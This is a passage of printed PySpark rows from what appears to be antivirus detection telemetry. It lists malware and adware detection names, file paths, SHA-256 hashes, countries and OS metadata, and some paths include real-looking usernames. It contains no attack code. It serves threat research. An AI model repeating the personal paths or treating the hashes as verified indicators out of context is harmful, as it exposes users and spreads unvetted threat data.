timestamp='2018-11-04T13:07:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-085234-2acabd4d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1aa6796b\\AVSCAN-20181104-085215-282DE527\\AVSCAN-20181104-085234-2ACABD4D', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:20:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T06:11:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-122028-b2fe65fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1b9e48aa\\AVSCAN-20181104-122002-AF29DBDB\\AVSCAN-20181104-122028-B2FE65FE', filesize=596000, name='PUA/Outbrowse.Gen.#M300.#R5962'), hash='4dbf49f6a9354c4912929ac204821cda50ad285e242808ccf9ec4790b773ceda', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:20:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='videoconvert.8cca7a88d5714667a63e6a45952a6266[1].exe', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\077Z9PO7\\VideoConvert.8cca7a88d5714667a63e6a45952a6266[1].exe', filesize=380000, name='PUA/MyWebSearch.Gen.#M300.#R6777'), hash='2ef9d244711647f816f2f0600bfeb1247fad7214ccc12e1851e40d42e7d3b3b0', metadata=Row(cmdline='SCODEF:1284 CREDAT:275457 \\\\\\/prefetch:2', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=817456, timestamp='2018-11-04T08:45:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132630-5c6c5df3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132630-5C6C5DF3', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:26:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130958-11783a56', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-130958-11783A56', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:09:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215832-f4fda088', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c800e319\\AVSCAN-20181104-215817-F15AC446\\AVSCAN-20181104-215832-F4FDA088', filesize=256000, name='TR/Dropper.Gen.#M1.#R1'), hash='88723e07f10da4f273d86dd702476abc8e39e8a8f7e2ca936827af81e112701c', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:28:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='stronghold crusadermgr.exe', filepath='C:\\Users\\X\\Desktop\\hard\\1\\Stronghold Crusadermgr.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3048fd0aa79bafe42cfdad11afbb3047db01f277a1aa4ecf8e773ae2e7688e13', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:PAYKxkRkvUCtwwVO.1', country='IR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T08:19:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-193929-91c7f5d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eba24208\\AVSCAN-20181104-141832-F573C2FF\\AVSCAN-20181104-193929-91C7F5D7', filesize=556000, name='PUA/MPCCleaner.#M1.#R1'), hash='08cce85de6b7808af17666c9689a16e424590770839d9ee966d73b9580abc94f', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T16:37:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='search[1].htm', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\97YI5V4O\\search[1].htm', filesize=100000, name='HTML/ExpKit.Gen3.#M1.#R1'), hash='566a1432c898dd9738dae32412a098b8f83964d4bebe6030034635ed3bb5393a', metadata=Row(cmdline='SCODEF:1164 CREDAT:1447397 \\\\\\/prefetch:2', country='JP', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=817456, timestamp='2018-11-04T09:20:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-200748-45154b8b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-200142-1862C1A1\\AVSCAN-20181104-200748-45154B8B', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T13:08:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rlistupdater', filepath='/Users/AndiSpark/Library/Application Support/amc/helperamc.app/Contents/Resources/rlistupdater.app/Contents/MacOS/rlistupdater', filesize=204000, name='OSX/GT32SupportGeeks.owcbg.#M0.#R0'), hash='877421f09497bb504dde87c3107888c89f174b955dacb088873bf9754babe5f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:32:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140334-fa327f5f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140334-FA327F5F', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:11:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tigertrade.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\TigerTrade.exe', filesize=384000, name='HEUR/AGEN.1030805.#M1.#R1'), hash='8f9071b1fb905289828df92b59cc96a6999bdad492e68e3dcc5ab8084dd4c219', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1866864, timestamp='2018-11-04T11:05:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_1cd7235c.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_1cd7235c.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T11:21:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fst_de_182.exe.vir', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\C\\Program Files (x86)\\fst_de_182\\fst_de_182.exe.vir', filesize=3968000, name='Adware/Eorezo.ldor.#M1.#R1'), hash='23b2e89ec91237026a2bee1281972855bdb3ef408985be5307b554e518f88e6a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:18:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T16:14:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T20:14:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-145029-3935e5ca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_128ca42a\\AVSCAN-20181104-144839-2A817995\\AVSCAN-20181104-145029-3935E5CA', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:35:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='859fdf95109387e91dde4bcb0691c675fceb741dbcc512ac20ce2ee365b92c7d', metadata=Row(cmdline='\\\\\\/Embedding', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T17:20:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-183632-b35a7160', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7ee3d5e8\\AVSCAN-20181104-183450-A9800D56\\AVSCAN-20181104-183632-B35A7160', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='bc83b5db2dd32e9b8ba7fa5257606a1d27ef6d9d14b6040152a1c52af8355261', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:36:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-153406-2a57e097', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d2159bcd\\AVSCAN-20181104-153335-260E53C5\\AVSCAN-20181104-153406-2A57E097', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:34:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8876', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8876', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:30:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='kms10.exe', filepath='c:\\windows\\kms10\\kms10.exe', filesize=2176000, name='SPR/HackKMS.d5c565.#M1.#R1'), hash='d5c56597bf7381a46cd51bc26ff6a004945bc08a2760197ae45b98d904d14268', metadata=Row(cmdline='auto', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=192000, timestamp='2018-11-04T11:07:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='\\\\?\\C:\\Program Files\\ProKAward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:32:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T15:32:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:01:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-121054-0d41f678', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2615e84a\\AVSCAN-20181104-120343-D12656CE\\AVSCAN-20181104-121054-0D41F678', filesize=684000, name='PUA/GetNow.Gen4.#M300.#R5796'), hash='5e8f43297d239481b1c34410ced26177b81648db206b48fba712dd0e88f672a5', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:11:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mfl_vc9.dll', filepath='C:\\Program Files (x86)\\MAGIX\\Audio Cleaning Lab 2016\\VideoExportMaker\\MFL_VC9.dll', filesize=772000, name='W32/Ramnit.C.#M1.#R1'), hash='8699632edbbbe3aa5850325e8192e7597af1ec7d087dde65a7eb592dc508444f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=673048, timestamp='2018-11-04T21:21:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T06:21:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='опись документов 1.1.exe', filepath='F:\\Проф\\Опись документов 1.1.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='07c5a52329e42aa99f7582672622be8164b4605129da966a4279eac849e0c54c', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Distrib\\Total Commander\\Totalcmd.exe', parentsize=826916, timestamp='2018-11-04T12:44:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='professional egr remover.exe', filepath='C:\\Program Files\\Professional EGR Remover\\Professional EGR Remover.exe', filesize=8000000, name='TR/Crypt.ZPACK.Gen.#M300.#R8169'), hash='325fcfaae8403873bd8772fa2c68a7e1a4b9ba82601c29b9be4663862cbc8e6d', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:45:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T06:05:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181102-090509-bee5ef65', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-090509-BEE5EF65', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='f37bd445ff5707df09e0ad9fb4e0150a45a26785690bb7de4639d56d4b486d79', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:07:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00005bd4', filepath='C:\\Windows\\Temp\\tmp0000550b\\tmp00005bd4', filesize=12800000, name='TR/Patched.Ren.Gen2.#M300.#R100581'), hash='a649d85d0910f7561f31b0e9eaf8cb8977aafcc0aaa5fe72f90f5a7851ccf622', metadata=Row(cmdline='-k bdx -s scan', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-02T15:58:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:55:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hpqemlsz.exe', filepath='C:\\Program Files\\HP\\Digital Imaging\\bin\\hpqEmlsz.exe', filesize=208000, name='W32/Infector.Gen.#M300.#R7863'), hash='b27fd6d9d2d1258e55c8d4ee6cc12716563a84353bd92ba692613b07886e5106', metadata=Row(cmdline='-u -p 5132 -s 140', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WerFault.exe', parentsize=360448, timestamp='2018-11-02T15:07:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='downloader-fuer-cobj3.exe', filepath='G:\\Neue Downloads\\Downloader-fuer-cobj3.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='7c7aa9e91dc1b448e160f653614a0add4a55ba56c983422f986851e7c840dd4f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T14:05:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:39:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\C:\\Users\\X\\Miners\\0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:26:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-133430-d15f6008', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-132855-AA652CC5\\AVSCAN-20181102-133430-D15F6008', filesize=10368000, name='TR/Eroyee.f062a6.#M1.#R1'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:32:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:50:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pg_config.exe', filepath='C:\\ManageEngine\\SupportCenter\\pgsql\\bin\\pg_config.exe', filesize=128000, name='TR/Patched.Gen.#M300.#R5151'), hash='8075f81132cf522be54d082d9fa92bd5803395f4b384855ed9dd87466b39b900', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:XjKn4Q6ZZ0mM9Zs7.1', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=81640, timestamp='2018-11-02T02:28:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-001436-45a2379a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4aa09382\\AVSCAN-20181103-001308-3D73294B\\AVSCAN-20181103-001436-45A2379A', filesize=1544000, name='PUA/InstallCore.Gen2.#M1.#R1'), hash='784442b0abd7bc2e8631f77f23ec2339c361e13e76ddce549c2e3ee0862c474f', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T23:14:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8d415c15376becee5d6bd66250b812fdb9442d814ace3f61a26f73537feab54d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8D415C15376BECEE5D6BD66250B812FDB9442D814ACE3F61A26F73537FEAB54D', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='8d415c15376becee5d6bd66250b812fdb9442d814ace3f61a26f73537feab54d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:17:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='upohth.exe', filepath='c:\\users\\X\\appdata\\roaming\\upohth.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=460288, timestamp='2018-11-02T17:38:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-085536-d5f0f0f3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-085536-D5F0F0F3', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='b818eb54b8943b689f375c87c8f54abbc05390c2ceaaf737f77be654c732e5f9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:57:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='edman.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Gutterman\\edman.dll', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='a412281a455c5f83b9fee64c1725a50241a0f9917bd531b2a2ded0fda300cfc5', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:54:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='warface my.com_eu__na__07.02.2017_.exe', filepath='D:\\warface my.com_EU__NA__07.02.2017_.exe', filesize=1408000, name='HEUR/AGEN.1004088.#M1.#R1'), hash='c915f226d6f4fbb89f7686abcedebcb0fcce5ad27f75ed64d3a5b34e147b8454', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T07:19:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vsystem volume information.exe', filepath='j:\\vSystem Volume Information.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='BJ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:47:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='comm7575.htm', filepath='\\\\SERVERPC\\MASTER SOFTWARE\\1. Crystal Reports 8.5\\ProgramF\\SEAGAT~1\\CRW\\Help\\En\\HTML\\COMM7575.htm', filesize=252000, name='W32/Chir.B.#M1.#R1'), hash='c17b098358ba274403438132284ffa6a5438dd0395ed7bf7c6820a16092179d3', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\SIMRS NEW\\SIMRS.exe', parentsize=15815676, timestamp='2018-11-02T01:35:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='c1ac1bb865024474e2d18e95a9b7dc08bd35751d872cf3042864901d04ab864b', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:06:47Z'), dt=datetime.date(2018, 11, 2)),
